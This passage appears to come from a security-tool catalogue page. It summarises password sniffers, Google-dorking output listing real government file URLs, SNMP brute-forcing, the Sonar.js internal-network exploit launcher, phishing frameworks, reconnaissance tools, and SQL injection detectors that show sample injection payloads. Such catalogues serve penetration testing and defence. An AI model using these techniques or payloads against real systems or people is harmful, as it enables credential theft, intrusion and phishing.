    4. In order to verify that the password sniffing works in your system, go to the demo Web page at http://www.nirsoft.net/password_test and type 'demo' as user name and 'password' as the password. After typing the user name/password and clicking 'Ok', you should see a new line in the main window of SniffPass containing the user/password you typed.

    Get passwords of another computer on your network ?

    Many people ask me whether SniffPass is able to get passwords from another computer on the same network. So here's the answer. In order to grab the passwords from other network computers:
    1. You must use a simple hub to connect your computers to the network. All modern switches and routers automatically filter the packets of the other computers, so the computer that runs SniffPass will never "see" the passwords of other computers when you use a switch or a router.
    2. Your network card must be able to enter into 'Promiscuous Mode'.
    3. You must use WinPCap or Network Monitor Driver as a capture method.
    4. For wireless network: Most wireless network cards (or their device drivers) automatically filter the packets of other computers, so you won't be able the capture the passwords of ther computers. However, starting from Windows Vista/7, you can capture passwords of wireless networks that are not encrypted, by using Wifi Monitor Mode and Network Monitor Driver 3.x.  
      For more information about capturing from wireless networks , read this Blog post: How to capture data and passwords of unsecured wireless networks with SniffPass and SmartSniff

    Command-Line Options

    Command Description
    /NoCapDriver Starts SniffPass without loading the WinPcap Capture Driver.
    /NoReg Starts SniffPass without loading/saving your settings to the Registry.     


    Download SniffPass

    Snitch - Information Gathering via dorks


    Snitch is a tool which automate dorking process for specified domain. Using build-in dork categories, this tool helps gather informations about domain which can be found using search engines. It can be quite useful in early phases of pentest.

    Examples

    devil@hell:~/snitch/$ python snitch.py
    
                           _ __       __  
               _________  (_) /______/ /_ 
              / ___/ __ \/ / __/ ___/ __ \ 
             (__  ) / / / / /_/ /__/ / / /
            /____/_/ /_/_/\__/\___/_/ /_/ ~0.2   
    
    Usage: snitch.py [options]
    
    Options:
      -h, --help            show this help message and exit
      -U [url], --url=[url]
                            domain(s) or domain extension(s) separated by comma *
      -D [type], --dork=[type]
                            dork type(s) separated by comma *
      -O [file], --output=[file]
                            output file
      -S [ip:port], --socks=[ip:port]
                            socks5 proxy
      -I [seconds], --interval=[seconds]
                            interval between requests, 2s by default
      -P [pages], --pages=[pages]
                            pages to retrieve, 10 by default
      -v                    turn on verbosity
    
    Dork types:
      info  | Information leak & Potential web bugs
      ext   | Sensitive extensions
      docs  | Documents & Messages
      files | Files & Directories
      soft  | Web software
      all   | All
    
    Examples:
      snitch.py -I5 -P3 --dork=ext,info -U gov -S 127.0.0.1:9050
      snitch.py --url=site.com -D all -O /tmp/dorks
    
    

    devil@hell:~/snitch/$ python snitch.py -U gov -D ext -P20 -S 127.0.0.1:9050
    [+] Target: gov
    [!] Using SOCKS5 (IP - XX.XX.XX.XX)
    [!] Pages limit set to 20
    
    [+] Looking for sensitive extensions
    
    http://www.seismic.ca.gov/pub/CSSC_1998-01_COG.pdf.OLD
    http://greengenes.lbl.gov/Download/Sequence_Data/Fasta_data_files/CoreSet_2010/formatdb.log
    http://www.uspto.gov/web/patents/pdx/permitting_access.pdf_2010may17.bak
    http://www.dss.virginia.gov/tst.log
    http://appliedresearch.cancer.gov/nhanes_pam/create.pam_perday.log
    ftp://ftp.eia.doe.gov/pub/oil_gas/natural_gas/feature_articles/2006/ngshock/ngshock.pdf.bak
    http://appliedresearch.cancer.gov/nhanes_pam/create.pam_perminute.log
    https://igscb.jpl.nasa.gov/igscb/station/mgexlog/nya2_20130905.log
    http://www.swrcb.ca.gov/losangeles/board_decisions/adopted_orders/index.shtml.old
    https://trac.mcs.anl.gov/projects/mpich2/attachment/ticket/83/config.log
    https://tcga-data.nci.nih.gov/docs/index.html.bak
    https://software.sandia.gov/trac/canary/attachment/ticket/3917/Pike_Hach%26SCAN_Oracle.edsx_convert.log
    http://www.glerl.noaa.gov/metdata/2check_all.log
    http://ft.ornl.gov/eavl/regression/configure.log
    http://airsar.jpl.nasa.gov/airdata/PRECISION_LOG/hd1883.log
    http://www.antd.nist.gov/pubs/Sriram_BGP_IEEE_JSAC.pdf.old
    http://www-esh.fnal.gov/pls/default/itna.log
    http://www.lanl.gov/wrtout/projects/tscattering/nano/Output//Defaults/ellipsoid.log
    http://maine.gov/REVENUE/netfile/WS_FTP.LOG
    http://mls.jpl.nasa.gov/lay/UARS_MLS.LOG
    http://airsar.jpl.nasa.gov/airdata/PRECISION_LOG/hd1469.log
    http://www.modot.mo.gov/_baks/indexalt.htm.0001.b041.bak
    ftp://ftp.hrsa.gov/ruralhealth/FY04RAEDGuidance.pdf.bak
    https://www.health.ny.gov/health_care/medicaid/nyserrcd.ini
    http://www.thruway.ny.gov/business/contractors/expedite/bid.ini
    http://www.star.bnl.gov/~pjakl/documents/configuration.cfg
    http://www.wpc.ncep.noaa.gov/html/ecmwf0012loop500_ak.cfg
    https://fermilinux.fnal.gov/documentation/security/krb5.conf
    http://mirror.pnl.gov/macports/release/ports/security/fail2ban/files/pf-icefloor.conf
    https://svn.mcs.anl.gov/repos/ZeptoOS/trunk/BGP/ramdisk/CN/tree/etc/syslog.conf
    http://cmip-pcmdi.llnl.gov/cmip5/docs/esg.ini
    https://security.fnal.gov/krb5.conf
    http://collaborate2.nws.noaa.gov/canned_data/data_files/pqact.conf
    
    [+] Done!
    
    


    Download Snitch

    SNMP Brute - Fast SNMP brute force, enumeration, CISCO config downloader and password cracking script

    SNMP brute force, enumeration, CISCO config downloader and password cracking script. Listens for any responses to the brute force community strings, effectively minimising wait time.

    Requirements
    • metasploit
    • snmpwalk
    • snmpstat
    • john the ripper

    Usage
    python snmp-brute.py -t [IP]


    Options
    --help, -h show this help message and exit
    --file=DICTIONARY, -f DICTIONARY Dictionary file
    --target=IP, -t IP Host IP
    --port=PORT, -p PORT SNMP port


    Advanced
    --rate=RATE, -r RATE Send rate
    --timeout=TIMEOUT Wait time for UDP response (in seconds)
    --delay=DELAY Wait time after all packets are send (in seconds)
    --iplist=LFILE IP list file
    --verbose, -v Verbose output


    Automation
    --bruteonly, -b Do not try to enumerate - only bruteforce
    --auto, -a Non Interactive Mode
    --no-colours No colour output


    Operating Systems
    --windows Enumerate Windows OIDs (snmpenum.pl)
    --linux Enumerate Linux OIDs (snmpenum.pl)
    --cisco Append extra Cisco OIDs (snmpenum.pl)


    Alternative Options
    --stdin, -s Read communities from stdin
    --community=COMMUNITY, -c COMMUNITY Single Community String to use
    --sploitego Sploitego's bruteforce method


    Features
    • Brute forces both version 1 and version 2c SNMP community strings
    • Enumerates information for CISCO devices or if specified for Linux and Windows operating systems.
    • Identifies RW community strings
    • Tries to download the router config (metasploit module).
    • If the CISCO config file is downloaded, shows the plaintext passwords (metasploit module) and tries to crack hashed passords with John the Ripper


    Download SNMP Brute

    Socat - Multipurpose relay (SOcket CAT)

    Socat is a utility similar to the venerable Netcat that works over a number of protocols and through a files, pipes, devices (terminal or modem, etc.), sockets (Unix, IP4, IP6 - raw, UDP, TCP), a client for SOCKS4, proxy CONNECT, or SSL, etc. It provides forking, logging, and dumping, different modes for interprocess communication, and many more options. It can be used, for example, as a TCP relay (one-shot or daemon), as a daemon-based socksifier, as a shell interface to Unix sockets, as an IP6 relay, for redirecting TCP-oriented programs to a serial line, or to establish a relatively secure environment (su and chroot) for running client or server shell scripts with network connections.

    Socat is a command line based utility that establishes two bidirectional byte streams and transfers data between them. Because the streams can be constructed from a large set of different types of data sinks and sources (see address types), and because lots of address options may be applied to the streams, socat can be used for many different purposes.

    Filan is a utility that prints information about its active file descriptors to stdout. It has been written for debugging socat, but might be useful for other purposes too. Use the -h option to find more infos.

    Procan is a utility that prints information about process parameters to stdout. It has been written to better understand some UNIX process properties and for debugging socat, but might be useful for other purposes too.

    The life cycle of a socat instance typically consists of four phases.

    In the init phase, the command line options are parsed and logging is initialized.

    During the open phase, socat opens the first address and afterwards the second address. These steps are usually blocking; thus, especially for complex address types like socks, connection requests or authentication dialogs must be completed before the next step is started.

    In the transfer phase, socat watches both streams' read and write file descriptors via select() , and, when data is available on one side and can be written to the other side, socat reads it, performs newline character conversions if required, and writes the data to the write file descriptor of the other stream, then continues waiting for more data in both directions.

    When one of the streams effectively reaches EOF, the closing phase begins. Socat transfers the EOF condition to the other stream, i.e. tries to shutdown only its write stream, giving it a chance to terminate gracefully. For a defined time socat continues to transfer data in the other direction, but then closes all remaining channels and terminates.

    OPTIONS

    Socat provides some command line options that modify the behaviour of the program. They have nothing to do with so called address options that are used as parts of address specifications.

    -V
    Print version and available feature information to stdout, and exit.
    -h | -?
    Print a help text to stdout describing command line options and available address types, and exit.
    -hh | -??
    Like -h, plus a list of the short names of all available address options. Some options are platform dependend, so this output is helpful for checking the particular implementation.
    -hhh | -???
    Like -hh, plus a list of all available address option names.
    -d
    Without this option, only fatal and error messages are generated; applying this option also prints warning messages. See DIAGNOSTICS for more information.
    -d -d
    Prints fatal, error, warning, and notice messages.
    -d -d -d
    Prints fatal, error, warning, notice, and info messages.
    -d -d -d -d
    Prints fatal, error, warning, notice, info, and debug messages.
    -D
    Logs information about file descriptors before starting the transfer phase.
    -ly[<facility>]
    Writes messages to syslog instead of stderr; severity as defined with -d option. With optional <facility>, the syslog type can be selected, default is "daemon". Third party libraries might not obey this option.
    -lf <logfile>
    Writes messages to <logfile> [filename] instead of stderr. Some third party libraries, in particular libwrap, might not obey this option.
    -ls
    Writes messages to stderr (this is the default). Some third party libraries might not obey this option, in particular libwrap appears to only log to syslog.
    -lp<progname>
    Overrides the program name printed in error messages and used for constructing environment variable names.
    -lu
    Extends the timestamp of error messages to microsecond resolution. Does not work when logging to syslog.
    -lm[<facility>]
    Mixed log mode. During startup messages are printed to stderr; when socat starts the transfer phase loop or daemon mode (i.e. after opening all streams and before starting data transfer, or, with listening sockets with fork option, before the first accept call), it switches logging to syslog. With optional <facility>, the syslog type can be selected, default is "daemon".
    -lh
    Adds hostname to log messages. Uses the value from environment variable HOSTNAME or the value retrieved with uname() if HOSTNAME is not set.
    -v
    Writes the transferred data not only to their target streams, but also to stderr. The output format is text with some conversions for readability, and prefixed with "> " or "< " indicating flow directions.
    -x
    Writes the transferred data not only to their target streams, but also to stderr. The output format is hexadecimal, prefixed with "> " or "< " indicating flow directions. Can be combined with -v .
    -b<size>
    Sets the data transfer block <size> [size_t]. At most <size> bytes are transferred per step. Default is 8192 bytes.
    -s
    By default, socat terminates when an error occurred to prevent the process from running when some option could not be applied. With this option, socat is sloppy with errors and tries to continue. Even with this option, socat will exit on fatals, and will abort connection attempts when security checks failed.
    -t<timeout>
    When one channel has reached EOF, the write part of the other channel is shut down. Then, socat waits <timeout> [timeval] seconds before terminating. Default is 0.5 seconds. This timeout only applies to addresses where write and read part can be closed independently. When during the timeout interval the read part gives EOF, socat terminates without awaiting the timeout.
    -T<timeout>
    Total inactivity timeout: when socat is already in the transfer loop and nothing has happened for <timeout> [timeval] seconds (no data arrived, no interrupt occurred...) then it terminates. Useful with protocols like UDP that cannot transfer EOF.
    -u
    Uses unidirectional mode. The first address is only used for reading, and the second address is only used for writing (example).
    -U
    Uses unidirectional mode in reverse direction. The first address is only used for writing, and the second address is only used for reading.
    -g
    During address option parsing, don't check if the option is considered useful in the given address environment. Use it if you want to force, e.g., appliance of a socket option to a serial device.
    -L<lockfile>
    If lockfile exists, exits with error. If lockfile does not exist, creates it and continues, unlinks lockfile on exit.
    -W<lockfile>
    If lockfile exists, waits until it disappears. When lockfile does not exist, creates it and continues, unlinks lockfile on exit.
    -4
    Use IP version 4 in case that the addresses do not implicitly or explicitly specify a version; this is the default.
    -6
    Use IP version 6 in case that the addresses do not implicitly or explicitly specify a version. 


    Download Socat

    Softavir - Antivirus for Windows based on Whitelists


    SoftAvir is a security tool that ensures complete protection for your computer by creating a whitelist. The user select the only programs that can be run avoiding in this way the execution of any other unwanted program.

    How does it work?

    Softavir is the first antimalware solution that relies operation in advanced cryptographic whitelisting technology.

    After installed, the user must add the programs that can be run. Softavir will not allow the execution of any program that has not been added to the list (including viruses, tojans and other malware).

    Who is it for?

    Softavir is recommended to Microsoft Windows users. The current version is compatible with Microsoft Windows x86 operating systems. Soon will come out a version for Microsoft Windows x64 operating systems.

    Main advantages:

    • 100% protection against new threats.
    • Does not require updates.
    • Improved software management.
    • Easy maintenance of your equipment.
    • Avoids the need of regular formatting.

    Download Softavir

    Sonar.js - Framework for identifying and launching exploits against internal network hosts

    A framework for identifying and launching exploits against internal network hosts. Works via WebRTC IP enumeration, WebSocket host scanning, and external resource fingerprinting.

    How does it work?

    Upon loading the sonar.js payload in a modern web browser the following will happen:
    • sonar.js will use WebRTC to enumerate what internal IPs the user loading the payload has.
    • sonar.js then attempts to find live hosts on the internal network via WebSockets.
    • If a live host is found, sonar.js begins to attempt to fingerprint the host by linking to it via <img src="x"> and <link rel="stylesheet" type="text/css" href="x"> and hooking the onload event. If the expected resources load successfully it will trigger the pre-set JavaScript callback to start the user-supplied exploit.
    • If the user changes networks, sonar.js starts the process all over again on the newly joined network.

    Fingerprints

    sonar.js works off of a database of fingerprints. A fingerprint is simply a list of known resources on a device that can be linked to and detected via onload. Examples of this include images, CSS stylesheets, and even external JavaScript.

    An example fingerprint database can be seen below:
    var fingerprints = [
        {
            'name': "ASUS RT-N66U",
            'fingerprints': ["/images/New_ui/asustitle.png","/images/loading.gif","/images/alertImg.png","/images/New_ui/networkmap/line_one.png","/images/New_ui/networkmap/lock.png","/images/New_ui/networkmap/line_two.png","/index_style.css","/form_style.css","/NM_style.css","/other.css"],
            'callback': function( ip ) {
                // Insert exploit here
            },
        },
        {
            'name': "Linksys WRT54G",
            'fingerprints': ["/UILinksys.gif","/UI_10.gif","/UI_07.gif","/UI_06.gif","/UI_03.gif","/UI_02.gif","/UI_Cisco.gif","/style.css"],
            'callback': function( ip ) {
                // Insert exploit here
            },
        },
    ]
    
    The above database contains fingerprints for two devices, the ASUS RT-N66U WiFi router and the Linksys WRT54G WiFi router.

    Each database entry has the following:
    • name: A field to identify what device the fingerprint is for. This could be something like HP Officejet 4500 printer or Linksys WRT54G Router.
    • fingerprints: This is an array of relative links to resources such as CSS stylesheets, images, or even JavaScript files. If you expect these resources to be on a non-standard port such as 8080, set the resource with the port included: :8080/unique.css. Keep in mind using external resources with active content such as JavaScript is dangerous as it can interrupt the regular flow of execution.
    • callback: If all of these resources are found to exist on the enumerated host then the callback function is called with a single argument of the device's IP address.
    By creating your own fingerprints you can build custom exploits that will be launched against internal devices once they are detected by sonar.js. Common exploits include things such as Cross-site Request Forgery (CSRF), Cross-site Scripting (XSS), etc. The idea being that you can use these vulnerabilities to do things such as modifying router DNS configurations, dumping files from an internal fileserver, and more.

    For an easier way to create fingerprints, see the following Chrome extension which generates fingerprint template code automatically for the page you're on:
    Click Here to Install Chrome Extension


    What can be done using sonar.js?

    By using sonar.js a pentesting team can build web exploits against things such as internal logging servers, routers, printers, VOIP phones, and more. Due to internal networks often being less guarded, attacks such as CSRF and XSS can be powerful to take over the configurations of devices on a hosts internal network.


    Download Sonar.js

    SparkyLinux - Lightweight & fast Debian-based Linux Distribution


    SparkyLinux is a GNU/Linux distribution created on the “testing” branch of Debian. It features customized lightweight desktops (like E19, LXDE and Openbox), multimedia plugins, selected sets of apps and own custom tools to ease different tasks.

    Why Sparky?

    SparkyLinux is a Debian-based Linux distribution which provides ready to use, out of the box operating system with a set of slightly customized lightweight desktops.

    Sparky is targeted to all the computer’s users who want replace existing, proprietary driven OS to open-sourced.

    Sparky is also targeted to two different groups of users:
    • Full Editions – with all the tools, codecs, plugins and drivers preinstalled – to the users who want to have everything ready and works from the first system’s run
    • Base Editions – with minimal set of tools – to advanced users who like to set up everything as they want

    Main features of Sparky
    • Debian testing based
    • rolling release
    • lightweight, fast & simple
    • set of desktops to choose: LXDE, Enlightenment, JWM, KDE, LXQt, Openbox, MATE, Xfce
    • ultra light base edition with Openbox or JWM desktops
    • special gaming edition: GameOver
    • CLI Edition (no X) for building customized desktop
    • most wireless and mobile network cards supported
    • set of selected applications, multimedia codecs and plugins
    • own repository with a large set of additional applications
    • easy hard drive / USB installation
    In general, Sparky is not targeted to Linux beginners, rather to users with some amount of Linux knowledge.

    Anyway, the Linux beginners are welcome too – our forums is open for any question.


    Download SparkyLinux

    SPARTA - Network Infrastructure Penetration Testing Tool



    SPARTA is a python GUI application which simplifies network infrastructure penetration testing by aiding the penetration tester in the scanning and enumeration phase. It allows the tester to save time by having point-and-click access to his toolkit and by displaying all tool output in a convenient way. If little time is spent setting up commands and tools, more time can be spent focusing on analysing results.

    Features

    – Run nmap from SPARTA or import nmap XML output.
    – Transparent staged nmap: get results quickly and achieve thorough coverage.
    – Configurable context menu for each service. You can configure what to run on discovered services. Any tool that can be run from a terminal, can be run from SPARTA.
    – You can run any script or tool on a service across all the hosts in scope, just with a click of the mouse.
    – Define automated tasks for services (ie. Run nikto on every HTTP service, or sslscan on every ssl service).
    – Default credentials check for most common services. Of course, this can also be configured to run automatically.
    – Identify password reuse on the tested infrastructure. If any usernames/passwords are found by Hydra they are stored in internal wordlists which can then be used on other targets in the same network (breaking news: sysadmins reuse passwords).
    – Ability to mark hosts that you have already worked on so that you don’t waste time looking at them again.
    – Website screenshot taker so that you don’t waste time on less interesting web servers.


    Download SPARTA

    Speedtest - Command Line Interface for Testing Internet Bandwidth


    speedtest-cli is a command line interface for testing internet bandwidth using speedtest.net

    Installation

    pip / easy_install
    pip install speedtest-cli
    
    or
    easy_install speedtest-cli
    

    Github
    pip install git+https://github.com/sivel/speedtest-cli.git
    
    or
    git clone https://github.com/sivel/speedtest-cli.git
    python speedtest-cli/setup.py install
    

    Just download (Like the way it used to be)
    wget -O speedtest-cli https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest_cli.py
    chmod +x speedtest-cli
    
    or
    curl -Lo speedtest-cli https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest_cli.py
    chmod +x speedtest-cli
    

    Usage

    $ speedtest-cli -h
    usage: speedtest-cli [-h] [--bytes] [--share] [--simple] [--list]
                         [--server SERVER] [--mini MINI] [--source SOURCE]
                         [--timeout TIMEOUT] [--version]
    
    Command line interface for testing internet bandwidth using speedtest.net.
    --------------------------------------------------------------------------
    https://github.com/sivel/speedtest-cli
    
    optional arguments:
      -h, --help         show this help message and exit
      --bytes            Display values in bytes instead of bits. Does not affect
                         the image generated by --share
      --share            Generate and provide a URL to the speedtest.net share
                         results image
      --simple           Suppress verbose output, only show basic information
      --list             Display a list of speedtest.net servers sorted by
                         distance
      --server SERVER    Specify a server ID to test against
      --mini MINI        URL of the Speedtest Mini server
      --source SOURCE    Source IP address to bind to
      --timeout TIMEOUT  HTTP timeout in seconds. Default 10
      --version          Show the version number and exit
    


    Download Speedtest

    SPF - SpeedPhish Framework


    SPF (SpeedPhish Framework) is a python tool designed to allow for quick recon and deployment of simple social engineering phishing exercises.

    Requirements:
    • dnspython
    • twisted
    • PhantomJS

    Usage:
    usage: spf.py [-h] [-f <list.txt>] [-C <config.txt>] [--all] [--test] [-e]
                  [-g] [-s] [--simulate] [-w] [-W] [-d <domain>]
                  [-c <company's name>] [--ip <IP address>] [-v] [-y]
    
    optional arguments:
      -h, --help           show this help message and exit
      -d <domain>          domain name to phish
      -c <company's name>  name of company to phish
      --ip <IP address>    IP of webserver defaults to [192.168.1.124]
      -v, --verbosity      increase output verbosity
    
    input files:
      -f <list.txt>        file containing list of email addresses
      -C <config.txt>      config file
    
    enable flags:
      --all                enable ALL flags... same as (-e -g -s -w)
      --test               enable all flags EXCEPT sending of emails... same as
                           (-e -g --simulate -w -y -v -v)
      -e                   enable external tool utilization
      -g                   enable automated gathering of email targets
      -s                   enable automated sending of phishing emails to targets
      --simulate           simulate the sending of phishing emails to targets
      -w                   enable generation of phishing web sites
      -W                   leave web server running after termination of spf.py
    
    misc:
      -y                   automatically answer yes to all questions
    
    Execution:
    cd spf
    python spf.py --test -d example.com
    
    or to just test the websites:
    cd spf
    python web.py default.cfg
    

    Misc

    Video of sample usage

    BsidesKnox 2015 video


    Download SpeedPhish Framework

    SpiderFoot v2.6.1 - Open Source Intelligence Automation


    SpiderFoot is an open source intelligence automation tool. Its goal is to automate the process of gathering intelligence about a given target.

    Purpose 

    There are three main areas where SpiderFoot can be useful:
    1. If you are a pen-tester, SpiderFoot will automate the reconnaisance stage of the test, giving you a rich set of data to help you pin-point areas of focus for the test.
    2. Understand what your network/organisation is openly exposing to the outside world. Such information in the wrong hands could be a significant risk.
    3. SpiderFoot can also be used to gather threat intelligence about suspected malicious IPs you might be seeing in your logs or have obtained via threat intelligence data feeds.

    Features
    • Utilises a shedload of data sources; over 40 so far and counting, including SHODAN, RIPE, Whois, PasteBin, Google, SANS and more.
    • Designed for maximum data extraction; every piece of data is passed on to modules that may be interested, so that they can extract valuable information. No piece of discovered data is saved from analysis.
    • Runs on Linux and Windows. And fully open-source so you can fork it on GitHub and do whatever you want with it.
    • Visualisations. Built-in JavaScript-based visualisations or export to GEXF/CSV for use in other tools, like Gephi for instance.
    • Web-based UI. No cumbersome CLI or Java to mess with. Easy to use, easy to navigate. Take a look through the gallery for screenshots.
    • Highly configurable. Almost every module is configurable so you can define the level of intrusiveness and functionality.
    • Modular. Each major piece of functionality is a module, written in Python. Feel free to write your own and submit them to be incorporated!
    • SQLite back-end. All scan results are stored in a local SQLite database, so you can play with your data to your heart’s content.
    • Simultaneous scans. Each footprint scan runs as its own thread, so you can perform footprinting of many different targets simultaneously.
    • So much more.. check out the documentation for more information.

    Data Sources
    This is an ever-growing list of data sources SpiderFoot uses to gather intelligence about your target. A few require API keys but they are freely available.
    Source Location Notes
    abuse.ch http://www.abuse.ch Various malware trackers.
    AdBlock https://easylist-downloads.adblockplus.org/easylist.txt AdBlock pattern matches
    AlienVault https://reputation.alienvault.com AlienVault’s IP reputation database.
    Autoshun.org http://www.autoshun.org Blacklists.
    AVG Site Safety Report http://www.avgthreatlabas.com Site safety checker.
    Bing http://www.bing.com Scraping but future version to also use API.
    Blocklist.de http://lists.blocklist.de Blacklists.
    Checkusernames.com http://www.checkusernames.com Look up username availability on popular sites.
    DNS Your configured DNS server. Defaults to your local DNS but can be configured to whatever IP address you supply SpiderFoot.
    DomainTools http://www.domaintools.com
    DroneBL http://www.dronebl.org
    DuckDuckGo http://www.duckduckgo.com
    Facebook http://www.facebook.com Scraping but future version to also use API.
    FreeGeoIP http://freegeoip.net
    Github http://www.github.com
    Google http://www.google.com Scraping but future version to also use API.
    Google+ http://plus.google.com Scraping but future version to also use API.
    Google Safe Browsing http://www.google.com/safebrowsing Site safety checker.
    IPCat https://raw.githubusercontent.com/client9/ipcat/master/datacenters.csv IP Categorisation.
    LinkedIn http://www.linkedin.com Scraping but future version to also use API.
    malc0de.com http://malc0de.com Blacklists.
    malwaredomainlist.com http://www.malwaredomainlist.com Blacklists.
    malwaredomains.com http://www.malwaredomains.com Blacklists.
    McAfee SiteAdvisor http://www.siteadvisor.com Site safety checker.
    NameDroppers http://www.namedroppers.org
    Notepad.cc http://www.notepad.cc
    Nothink.org http://www.nothink.org Blacklists.
    Onion.City http://onion.city Search engine for the dark web.
    OpenBL http://www.openbl.org Blacklists.
    PasteBin http://www.pastebin.com Achieved through Google scraping.
    Pastie http://www.pastie.org
    PGP Servers http://pgp.mit.edu/pks/ PGP public keys.
    PhishTank http://www.phishtank.org Identified phishing sites.
    Project Honeypot http://www.projecthoneypot.org Blacklists. API key needed.
    PunkSPIDER http://www.punkspider.org
    RIPE/ARIN http://stat.ripe.net/
    Robtex http://www.robtex.com
    SANS ISC http://isc.sans.edu Internet Storm Center IP reputation database.
    SHODAN http://www.shodanhq.com API key needed.
    SORBS http://www.sorbs.net Blacklists.
    SpamHaus http://www.spamhaus.org Blacklists.
    ThreatExpert http://www.threatexpert.com Blacklists.
    TOR Node List http://torstatus.blutmagie.de
    TotalHash.com http://www.totalhash.com Domains/IPs used by malware.
    UCEPROTECT http://www.uceprotect.net Blacklists.
    VirusTotal http://www.virustotal.com Domains/IPs used by malware. API key needed.
    WayBack Machine http://www.archive.org
    Whois Various Whois servers for different TLDs.
    XSSposed http://www.xssposed.org
    Yahoo http://www.yahoo.com Scraping but future version to also use API.
    Zone-H http://www.zone-h.org Easy to get black-listed. Log onto the site in a browser from the IP you’re scanning from first and enter the CAPTCHA, then it should be fine.


    Download SpiderFoot v2.6.1

    Sptoolkit Rebirth - Phishing Education Toolkit


    The spt (rebirth) project is an open source phishing education toolkit that aims to help in securing the mind as opposed to securing computers. Organizations spend billions of dollars annually in an effort to safeguard information systems, but spend little to nothing on the under trained and susceptible minds that operate these systems, thus rendering most technical protections instantly ineffective. A simple, targeted link is all it takes to bypass the most advanced security protections. The link is clicked, the deed is done.

    spt was developed from the ground up to provide a simple and easy to use framework to identify your weakest links so that you can patch the human vulnerability. If the spt project sounds interesting to you, please consider downloading it for evaluation in your own organization. Feedback is welcomed and always appreciated.

    INSTALLATION

    The Basics
    1. Create and configure the MySQL database. spt will need a MySQL database to house its data, so go ahead and create that database and configure the associated user account for the new database with ALL PRIVILEGES assigned to it. Be sure you record the database name, user name and password in a safe place, you'll need it soon to install spt!
    2. Ensure you have PHP 5.4
    3. Extract the spt files from the archive.
    4. Create a new directory on your web server, such as "spt" and upload the files to the directory.

    Install spt
    1.  Open your web browser and navigate to the location where you uploaded the files and browse to install.php. For example, http://www.myhost.com/spt/install.php. If you accidentally just go to the root of the folder you placed the files in, you will be prompted to start the installation by clicking the right pointing arrow.
    2. When prompted to accept the GNU General Public License, click the "I Agree!" button. For reference, you can read the full text of the license in the license.htm file included in the root of the extracted files.
    3. On the next page, you will get feedback on the readiness of your server to install the spt. You can learn more about any failed items by hovering over the icon. Click the “Proceed!” button if all checks passed, or click the “Proceed Anyways” button if one of the checks failed and you have verified that the spt installer is reporting incorrectly.
    4. On the next page, you will need to provide those database details from earlier. The default server and database ports are provided, be sure to change them if your installation will require something else. Enter in the remaining required information and click the "Install Database!" button to get things moving along.
    5. If all goes well, you will see a listing of tables that have been successfully created. Click "Continue!" to move on.
    6. If instead you see an error indicated, click the "<back" button to go back and enter the database information again.
    7. Now it's time to create your first user, for you! Enter your first and last name, email address and password and click the "Create User" button to continue on.
    8. If you receive any errors, such as for an invalid email address or a password that does not meet the complexity requirements, click the "<back" button and try it again.
    9. Once you enter the required information successfully, you will receive confirmation. Click the "Proceed to Login" button to get logged into the spt!
    10. Now it's time to login using the email address and password you entered in the previous step. See, that was easy!


    Download Sptoolkit Rebirth

    SQLassie - Effective Database Security


    SQLassie is a free MySQL database firewall that prevents SQL injection attacks at runtime. SQLassie uses Bayesian classifiers to determine the likelihood of a query being an attack. This approach produces fewer false positives than other similar approaches.

    Security
    SQLassie prevents injection attacks before they have a chance to run.

    Instantaneous
    Protection is instantaneous - just point your web applications at SQLassie and you're done!

    Analysis
    SQLassie tracks suspicious queries, classifies them based on their intent, and logs this information for further review.

    Options
    SQLassie can be used as a passive intrusion detection system or as an active intrusion prevention system.

    Support
    SQLassie is free and being constantly updated and improved. Have a problem or feature request? Let us know!

    Usage

    SQLassie currently only supports MySQL. To start SQLassie, you'll need to configure how SQLassie connects to the MySQL server, start SQLassie listening on a different port that is now protected, and then configure your applications to connect through this alternate port instead of directly to MySQL.
    As an example, consider a scenario where you have a MySQL database engine running and listening for connections on the domain socket /var/run/mysql/mysqld.sock and are running a MediaWiki installation.

    First, start SQLassie using
    ./sqlassie -s /var/run/mysql/mysqld.sock -l 3307
    Then, edit MediaWiki's configuration file LocalSettings.php connect to port 3307.
    $wgDBServer = "127.0.0.1:3307"
    

    Note that you can't use localhost here; by default, MySQL interprets localhost as a request to use the direct database domain socket connection, and most web applications behave this way as well. Therefore, you have to use the explicit string 127.0.0.1 in order to force connections to go through the TCP port. Check your application's documentation for more information.


    SQLChop - SQL Injection Detection Engine


    SQLChop is a novel SQL injection detection engine built on top of SQL tokenizing and syntax analysis. Web input (URLPath, body, cookie, etc.) will be first decoded to the raw payloads that web app accepts, then syntactical analysis will be performed on payload to classify result. The algorithm behind SQLChop is based on compiler knowledge and automata theory, and runs at a time complexity of O(N).

    Documentation

    http://sqlchop.chaitin.com/doc.html

    Dependencies

    The SQLChop alpha testing release includes the c++ header and shared object, a python library, and also some sample usages. The release has been tested on most linux distributions.
    If using python, you need to install protobuf-python, e.g.:
    $ sudo pip install protobuf
    
    If using c++, you need to install protobuf, protobuf-compiler and protobuf-devel, e.g.:
    $ sudo yum install protobuf protobuf-compiler protobuf-devel

    Build

    SQLChop Python API

    The current alpha testing release is provided as a python library. C++ headers and examples will be released soon.
    The following APIs are the main interfaces SQLChop export.

    is_sqli

    Given a raw payload, determine whether the payload is an SQL injection payload.
    • Parameter: string
    • Return value: bool, return True for SQLi payload, return False for normal case.
    >>> from sqlchop import SQLChop
    >>> detector = SQLChop()
    >>> detector.is_sqli('SELECT 1 From users')
    True
    >>> detector.is_sqli("' or '1'='1")
    True
    >>> detector.is_sqli('select the best student from classes as the student union representative')
    False
    >>> detector.is_sqli('''(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/''')
    True

    classify

    Given a web application input, classify API will decode the input and find possible SQL injection payload inside. If SQLi payload found, payloads will be listed.
    • Parameter 1: object with following keys
      1. urlpath: string, the urlpath of web request
      2. body: string, the http body of POST/PUT request
      3. cookie: string, the cookie content of web request
      4. raw: string, other general field that needs general decoding.
    • Parameter 2: detail, if detail is True, detailed payload list will be returned, if False, only result will be returned, which runs faster.
    • Return: an object contains result and payloads
      1. result: int, positive value indicates the web request contains sql injection payload
      2. payloads: list of objects containing key, score, value and source
        • key: string, reserved
        • source: string, shows where this payload is embed in original web request and how the payload is decoded
        • value: decoded sqli payload
        • score: the score of the decoded sqli payload
    Examples here:
    >>> from sqlchop import SQLChop
    >>> detector = SQLChop()
